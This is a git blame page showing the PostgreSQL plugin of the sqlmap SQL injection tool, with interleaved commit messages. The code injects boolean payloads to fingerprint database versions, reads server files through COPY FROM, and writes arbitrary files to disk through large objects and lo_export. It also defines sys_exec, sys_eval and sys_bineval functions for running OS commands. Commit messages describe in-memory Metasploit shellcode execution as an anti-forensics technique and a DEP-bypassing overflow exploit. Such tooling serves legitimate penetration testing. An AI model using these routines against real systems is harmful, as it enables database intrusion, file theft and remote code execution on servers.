sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-23 10:03:47 +03:00
Code Issues Packages Projects Releases Wiki Activity
f5c422efb4
sqlmap/plugins/dbms/postgresql.py

478 lines
18 KiB
Python
Raw Normal View History

After the storm, a restore..
2008-10-15 19:38:22 +04:00
#!/usr/bin/env python
"""
propsets..
2008-10-15 19:56:32 +04:00
$Id$
After the storm, a restore..
2008-10-15 19:38:22 +04:00
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
After the storm, a restore..
2008-10-15 19:38:22 +04:00
sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
import os
After the storm, a restore..
2008-10-15 19:38:22 +04:00
import re
Major speed increase in DBMS basic fingerprint
2008-12-23 02:26:44 +03:00
from lib.core.agent import agent
Minor enhancement to fingerprint the back-end DBMS operating system (type, version, release, distribution, codename and service pack) by parsing the DBMS banner value when both -f and -b are provided: adapted the code and added XML files defining regular expressions for matching. Example of the -f -b output now on MySQL 5.0.67 running on latest Ubuntu: --8<-- back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2 comment injection fingerprint: MySQL 5.0.67 banner parsing fingerprint: MySQL 5.0.67 html error message fingerprint: MySQL back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid) --8<--
2008-11-16 02:41:31 +03:00
from lib.core.common import formatDBMSfp
Minor enhancement to fingerprint the web server operating system and the web application technology by parsing also HTTP response Server header. Refactor libraries and plugins that parses XML to fingerprint and show on standard output the information. Updated changelog.
2008-11-18 20:42:46 +03:00
from lib.core.common import formatFingerprint
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.common import getHtmlErrorFp
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
from lib.core.common import getRange
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.common import randomInt
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
from lib.core.common import randomStr
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
from lib.core.data import paths
from lib.core.exception import sqlmapNoneDataException
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.exception import sqlmapSyntaxException
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
from lib.core.exception import sqlmapUnsupportedFeatureException
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.session import setDbms
from lib.core.settings import PGSQL_ALIASES
Major improvement to correctly enumerate tables, columns and dump tables entries on PostgreSQL when the database name is not 'public' or a system database and on Oracle. Minor code restyle.
2008-10-26 19:19:15 +03:00
from lib.core.settings import PGSQL_SYSTEM_DBS
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.unescaper import unescaper
from lib.request import inject
Major speed increase in DBMS basic fingerprint
2008-12-23 02:26:44 +03:00
from lib.request.connect import Connect as Request
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem
from plugins.generic.fingerprint import Fingerprint
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
from plugins.generic.misc import Miscellaneous
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from plugins.generic.takeover import Takeover
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
After the storm, a restore..
2008-10-15 19:38:22 +04:00
"""
This class defines PostgreSQL methods
"""
def __init__(self):
Minor code restyling
2008-10-26 20:00:07 +03:00
self.excludeDbsList = PGSQL_SYSTEM_DBS
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
self.sysUdfs = {
# UDF name: UDF parameters' input data-type and return data-type
"sys_exec": {
"input": [ "text" ],
"return": "int4"
},
"sys_eval": {
"input": [ "text" ],
"return": "text"
},
"sys_bineval": {
"input": [ "text" ],
"return": "int4"
}
}
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Enumeration.__init__(self, "PostgreSQL")
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Filesystem.__init__(self)
Takeover.__init__(self)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
unescaper.setUnescape(PostgreSQLMap.unescape)
@staticmethod
Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0 also if the user has provided one or more users with -U option;
2008-11-02 21:17:12 +03:00
def unescape(expression, quote=True):
if quote:
while True:
index = expression.find("'")
if index == -1:
break
firstIndex = index + 1
index = expression[firstIndex:].find("'")
if index == -1:
raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
lastIndex = firstIndex + index
old = "'%s'" % expression[firstIndex:lastIndex]
#unescaped = "("
unescaped = ""
for i in range(firstIndex, lastIndex):
unescaped += "CHR(%d)" % (ord(expression[i]))
if i < lastIndex - 1:
unescaped += "||"
#unescaped += ")"
expression = expression.replace(old, unescaped)
else:
expression = "||".join("CHR(%d)" % ord(c) for c in expression)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
return expression
@staticmethod
def escape(expression):
while True:
index = expression.find("CHR(")
if index == -1:
break
firstIndex = index
index = expression[firstIndex:].find("))")
if index == -1:
raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
lastIndex = firstIndex + index + 1
old = expression[firstIndex:lastIndex]
oldUpper = old.upper()
oldUpper = oldUpper.replace("CHR(", "").replace(")", "")
oldUpper = oldUpper.split("||")
escaped = "'%s'" % "".join([chr(int(char)) for char in oldUpper])
expression = expression.replace(old, escaped)
return expression
def getFingerprint(self):
Minor enhancement to fingerprint the web server operating system and the web application technology by parsing also HTTP response Server header. Refactor libraries and plugins that parses XML to fingerprint and show on standard output the information. Updated changelog.
2008-11-18 20:42:46 +03:00
value = ""
wsOsFp = formatFingerprint("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
Minor enhancement to show the DBMS operating system (if fingerprinted) also when only -b option is provided since it's an information that sqlmap get parsing the DBMS banner. Got rid completely of useless passive fuzzing.
2008-11-17 14:22:03 +03:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
if kb.data.banner:
Minor enhancement to fingerprint the web server operating system and the web application technology by parsing also HTTP response Server header. Refactor libraries and plugins that parses XML to fingerprint and show on standard output the information. Updated changelog.
2008-11-18 20:42:46 +03:00
dbmsOsFp = formatFingerprint("back-end DBMS", kb.bannerFp)
Minor enhancement to show the DBMS operating system (if fingerprinted) also when only -b option is provided since it's an information that sqlmap get parsing the DBMS banner. Got rid completely of useless passive fuzzing.
2008-11-17 14:22:03 +03:00
Minor enhancement to fingerprint the web server operating system and the web application technology by parsing also HTTP response Server header. Refactor libraries and plugins that parses XML to fingerprint and show on standard output the information. Updated changelog.
2008-11-18 20:42:46 +03:00
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
Minor enhancement to show the DBMS operating system (if fingerprinted) also when only -b option is provided since it's an information that sqlmap get parsing the DBMS banner. Got rid completely of useless passive fuzzing.
2008-11-17 14:22:03 +03:00
value += "back-end DBMS: "
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Minor layout adjustments, minor fixes and updated changelog
2008-11-17 03:00:54 +03:00
if not conf.extensiveFp:
value += "PostgreSQL"
return value
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Minor layout adjustments, minor fixes and updated changelog
2008-11-17 03:00:54 +03:00
actVer = formatDBMSfp()
blank = " " * 15
value += "active fingerprint: %s" % actVer
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Major enhancement to the engine to parse XML files and matches on DBMS banner and HTTP response headers. Initial web application technology fingerprint (for the moment based only on X-Powered-By HTTP response header and not shown yet to the user). Minor layout adjustments.
2008-11-17 20:41:02 +03:00
if kb.bannerFp:
Minor enhancement to fingerprint the web server operating system and the web application technology by parsing also HTTP response Server header. Refactor libraries and plugins that parses XML to fingerprint and show on standard output the information. Updated changelog.
2008-11-18 20:42:46 +03:00
banVer = kb.bannerFp["dbmsVersion"]
Minor enhancement to fingerprint the back-end DBMS operating system (type, version, release, distribution, codename and service pack) by parsing the DBMS banner value when both -f and -b are provided: adapted the code and added XML files defining regular expressions for matching. Example of the -f -b output now on MySQL 5.0.67 running on latest Ubuntu: --8<-- back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2 comment injection fingerprint: MySQL 5.0.67 banner parsing fingerprint: MySQL 5.0.67 html error message fingerprint: MySQL back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid) --8<--
2008-11-16 02:41:31 +03:00
banVer = formatDBMSfp([banVer])
After the storm, a restore..
2008-10-15 19:38:22 +04:00
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
Minor layout adjustments, minor fixes and updated changelog
2008-11-17 03:00:54 +03:00
htmlErrorFp = getHtmlErrorFp()
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Minor layout adjustments, minor fixes and updated changelog
2008-11-17 03:00:54 +03:00
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
return value
def checkDbms(self):
Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3
2008-10-29 18:32:12 +03:00
"""
Enhancements to PostgreSQL active fingerprint, now it covers also PostgreSQL 8.4 and minor speedups.
2010-01-12 14:44:47 +03:00
References for fingerprint:
* http://www.postgresql.org/docs/8.4/interactive/release.html (up to 8.4.2)
Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3
2008-10-29 18:32:12 +03:00
"""
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if conf.dbms in PGSQL_ALIASES:
setDbms("PostgreSQL")
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
self.getBanner()
Minor enhancement to show the DBMS operating system (if fingerprinted) also when only -b option is provided since it's an information that sqlmap get parsing the DBMS banner. Got rid completely of useless passive fuzzing.
2008-11-17 14:22:03 +03:00
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if not conf.extensiveFp:
return True
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
infoMsg = "testing PostgreSQL"
logger.info(infoMsg)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
randInt = str(randomInt(1))
Major speed increase in DBMS basic fingerprint
2008-12-23 02:26:44 +03:00
payload = agent.fullPayload(" AND %s::int=%s" % (randInt, randInt))
result = Request.queryPage(payload)
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
if result:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
infoMsg = "confirming PostgreSQL"
logger.info(infoMsg)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Major speed increase in DBMS basic fingerprint
2008-12-23 02:26:44 +03:00
payload = agent.fullPayload(" AND COALESCE(%s, NULL)=%s" % (randInt, randInt))
result = Request.queryPage(payload)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
if not result:
After the storm, a restore..
2008-10-15 19:38:22 +04:00
warnMsg = "the back-end DMBS is not PostgreSQL"
logger.warn(warnMsg)
return False
setDbms("PostgreSQL")
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
self.getBanner()
Minor enhancement to show the DBMS operating system (if fingerprinted) also when only -b option is provided since it's an information that sqlmap get parsing the DBMS banner. Got rid completely of useless passive fuzzing.
2008-11-17 14:22:03 +03:00
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if not conf.extensiveFp:
return True
Enhancements to PostgreSQL active fingerprint, now it covers also PostgreSQL 8.4 and minor speedups.
2010-01-12 14:44:47 +03:00
if inject.getValue("DIV(6, 3)", unpack=False, charsetType=2) == "2":
kb.dbmsVersion = [">= 8.4.0"]
elif inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)", unpack=False, charsetType=2) in ( "1", "2" ) and not inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)", unpack=False, charsetType=2) in ( "1", "2" ):
kb.dbmsVersion = [">= 8.3.0", "< 8.4"]
Minor bug fixed (variable undeclared)
2010-01-14 00:26:59 +03:00
elif inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)", unpack=False, charsetType=2):
Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3
2008-10-29 18:32:12 +03:00
kb.dbmsVersion = [">= 8.2.0", "< 8.3.0"]
Enhancements to PostgreSQL active fingerprint, now it covers also PostgreSQL 8.4 and minor speedups.
2010-01-12 14:44:47 +03:00
elif inject.getValue("GREATEST(5, 9, 1)", unpack=False, charsetType=2) == "9":
After the storm, a restore..
2008-10-15 19:38:22 +04:00
kb.dbmsVersion = [">= 8.1.0", "< 8.2.0"]
Enhancements to PostgreSQL active fingerprint, now it covers also PostgreSQL 8.4 and minor speedups.
2010-01-12 14:44:47 +03:00
elif inject.getValue("WIDTH_BUCKET(5.35, 0.024, 10.06, 5)", unpack=False, charsetType=2) == "3":
After the storm, a restore..
2008-10-15 19:38:22 +04:00
kb.dbmsVersion = [">= 8.0.0", "< 8.1.0"]
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
elif inject.getValue("SUBSTR(MD5('sqlmap'), 1, 1)", unpack=False):
After the storm, a restore..
2008-10-15 19:38:22 +04:00
kb.dbmsVersion = [">= 7.4.0", "< 8.0.0"]
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
elif inject.getValue("SUBSTR(CURRENT_SCHEMA(), 1, 1)", unpack=False) == "p":
After the storm, a restore..
2008-10-15 19:38:22 +04:00
kb.dbmsVersion = [">= 7.3.0", "< 7.4.0"]
elif inject.getValue("BIT_LENGTH(1)") == "8":
kb.dbmsVersion = [">= 7.2.0", "< 7.3.0"]
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
elif inject.getValue("SUBSTR(QUOTE_LITERAL('a'), 2, 1)", unpack=False) == "a":
After the storm, a restore..
2008-10-15 19:38:22 +04:00
kb.dbmsVersion = [">= 7.1.0", "< 7.2.0"]
Enhancements to PostgreSQL active fingerprint, now it covers also PostgreSQL 8.4 and minor speedups.
2010-01-12 14:44:47 +03:00
elif inject.getValue("POW(2, 3)", unpack=False, charsetType=2) == "8":
After the storm, a restore..
2008-10-15 19:38:22 +04:00
kb.dbmsVersion = [">= 7.0.0", "< 7.1.0"]
elif inject.getValue("MAX('a')") == "a":
kb.dbmsVersion = [">= 6.5.0", "< 6.5.3"]
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
elif re.search("([\d\.]+)", inject.getValue("SUBSTR(VERSION(), 12, 5)", unpack=False)):
After the storm, a restore..
2008-10-15 19:38:22 +04:00
kb.dbmsVersion = [">= 6.4.0", "< 6.5.0"]
Enhancements to PostgreSQL active fingerprint, now it covers also PostgreSQL 8.4 and minor speedups.
2010-01-12 14:44:47 +03:00
elif inject.getValue("SUBSTR(CURRENT_DATE, 1, 1)", unpack=False, charsetType=2) == "2":
After the storm, a restore..
2008-10-15 19:38:22 +04:00
kb.dbmsVersion = [">= 6.3.0", "< 6.4.0"]
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
elif inject.getValue("SUBSTRING('sqlmap', 1, 1)", unpack=False) == "s":
After the storm, a restore..
2008-10-15 19:38:22 +04:00
kb.dbmsVersion = [">= 6.2.0", "< 6.3.0"]
else:
kb.dbmsVersion = ["< 6.2.0"]
return True
else:
warnMsg = "the back-end DMBS is not PostgreSQL"
logger.warn(warnMsg)
return False
Major improvement to correctly enumerate tables, columns and dump tables entries on PostgreSQL when the database name is not 'public' or a system database and on Oracle. Minor code restyle.
2008-10-26 19:19:15 +03:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
def checkDbmsOs(self, detailed=False):
if kb.os:
return
infoMsg = "fingerprinting the back-end DBMS operating system"
logger.info(infoMsg)
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
self.createSupportTbl(self.fileTblName, self.tblField, "character(1000)")
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()"))
# Windows executables should always have ' Visual C++' or ' mingw'
# patterns within the banner
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
osWindows = ( " Visual C++", "mingw" )
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
for osPattern in osWindows:
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField)
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
query += "LIKE '%" + osPattern + "%')>0"
query = agent.forgeCaseStatement(query)
if inject.getValue(query, charsetType=1) == "1":
kb.os = "Windows"
break
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
if kb.os is None:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
kb.os = "Linux"
infoMsg = "the back-end DBMS operating system is %s" % kb.os
logger.info(infoMsg)
self.cleanup(onlyFileTbl=True)
Major improvement to correctly enumerate tables, columns and dump tables entries on PostgreSQL when the database name is not 'public' or a system database and on Oracle. Minor code restyle.
2008-10-26 19:19:15 +03:00
def forceDbmsEnum(self):
Minor if condition adjustment
2008-10-26 19:25:28 +03:00
if conf.db not in PGSQL_SYSTEM_DBS and conf.db != "public":
Major improvement to correctly enumerate tables, columns and dump tables entries on PostgreSQL when the database name is not 'public' or a system database and on Oracle. Minor code restyle.
2008-10-26 19:19:15 +03:00
conf.db = "public"
warnMsg = "on PostgreSQL it is only possible to enumerate "
warnMsg += "on the current schema and on system databases, "
warnMsg += "sqlmap is going to use 'public' schema as "
warnMsg += "database name"
logger.warn(warnMsg)
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
def unionReadFile(self, rFile):
errMsg = "PostgreSQL does not support file reading with UNION "
errMsg += "query SQL injection technique"
raise sqlmapUnsupportedFeatureException, errMsg
def stackedReadFile(self, rFile):
warnMsg = "binary file read on PostgreSQL is not yet supported, "
warnMsg += "if the requested file is binary, its content will not "
warnMsg += "be retrieved"
logger.warn(warnMsg)
infoMsg = "fetching file: '%s'" % rFile
logger.info(infoMsg)
result = []
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
self.createSupportTbl(self.fileTblName, self.tblField, "bytea")
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
logger.debug("loading the content of file '%s' into support table" % rFile)
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, rFile))
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
if kb.unionPosition:
result = inject.getValue("SELECT ENCODE(%s, 'base64') FROM %s" % (self.tblField, self.fileTblName), unpack=False, resumeValue=False, sort=False)
if not result:
result = []
count = inject.getValue("SELECT COUNT(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=2)
if not count.isdigit() or not len(count) or count == "0":
errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % rFile
raise sqlmapNoneDataException, errMsg
indexRange = getRange(count)
for index in indexRange:
chunk = inject.getValue("SELECT ENCODE(%s, 'base64') FROM %s OFFSET %d LIMIT 1" % (self.tblField, self.fileTblName, index), unpack=False, resumeValue=False, sort=False)
result.append(chunk)
return result
def unionWriteFile(self, wFile, dFile, fileType, confirm=True):
errMsg = "PostgreSQL does not support file upload with UNION "
errMsg += "query SQL injection technique"
raise sqlmapUnsupportedFeatureException, errMsg
def stackedWriteFile(self, wFile, dFile, fileType, confirm=True):
wFileSize = os.path.getsize(wFile)
if wFileSize > 8192:
errMsg = "on PostgreSQL it is not possible to write files "
errMsg += "bigger than 8192 bytes at the moment"
raise sqlmapUnsupportedFeatureException, errMsg
self.oid = randomInt()
debugMsg = "creating a support table to write the base64 "
debugMsg += "encoded file to"
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
logger.debug(debugMsg)
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
self.createSupportTbl(self.fileTblName, self.tblField, "text")
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
logger.debug("encoding file to its base64 string value")
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
fcEncodedList = self.fileEncode(wFile, "base64", False)
debugMsg = "forging SQL statements to write the base64 "
debugMsg += "encoded file to the support table"
logger.debug(debugMsg)
sqlQueries = self.fileToSqlQueries(fcEncodedList)
logger.debug("inserting the base64 encoded file to the support table")
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
for sqlQuery in sqlQueries:
inject.goStacked(sqlQuery)
debugMsg = "create a new OID for a large object, it implicitly "
debugMsg += "adds an entry in the large objects system table"
logger.debug(debugMsg)
# References:
# http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
# http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
inject.goStacked("SELECT lo_create(%d)" % self.oid)
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
debugMsg = "updating the system large objects table assigning to "
debugMsg += "the just created OID the binary (base64 decoded) UDF "
debugMsg += "as data"
logger.debug(debugMsg)
# Refereces:
# * http://www.postgresql.org/docs/8.3/interactive/catalog-pg-largeobject.html
# * http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql
#
# NOTE: From PostgreSQL site:
#
# "The data stored in the large object will never be more than
# LOBLKSIZE bytes and might be less which is BLCKSZ/4, or
# typically 2 Kb"
#
# As a matter of facts it was possible to store correctly a file
# large 13776 bytes, the problem arises at next step (lo_export())
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
inject.goStacked("UPDATE pg_largeobject SET data=(DECODE((SELECT %s FROM %s), 'base64')) WHERE loid=%d" % (self.tblField, self.fileTblName, self.oid))
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
debugMsg = "exporting the OID %s file content to " % fileType
debugMsg += "file '%s'" % dFile
logger.debug(debugMsg)
# NOTE: lo_export() exports up to only 8192 bytes of the file
# (pg_largeobject 'data' field)
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, dFile), silent=True)
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
